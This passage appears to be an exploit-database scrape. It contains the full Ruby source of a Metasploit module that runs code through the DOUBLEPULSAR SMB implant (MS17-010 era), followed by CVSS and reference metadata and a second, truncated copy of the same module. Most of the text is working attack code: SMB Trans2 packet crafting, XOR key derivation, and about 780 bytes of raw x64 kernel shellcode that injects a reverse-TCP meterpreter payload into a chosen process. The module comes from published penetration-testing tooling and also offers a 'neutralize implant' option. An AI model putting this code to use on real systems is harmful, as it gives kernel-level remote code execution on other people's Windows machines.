https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => 
true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-09] #"}, "lastseen": "2021-09-08T22:11:45", "differentElements": ["sourceData"], "edition": 11}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "0b4714ff5686e3ccd0040d2199e5c9e4", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-09T22:15:20", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27803", "1337DAY-ID-27786", 
"1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27802"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96709", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-09T22:15:20", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-09T22:15:20", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 
'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n 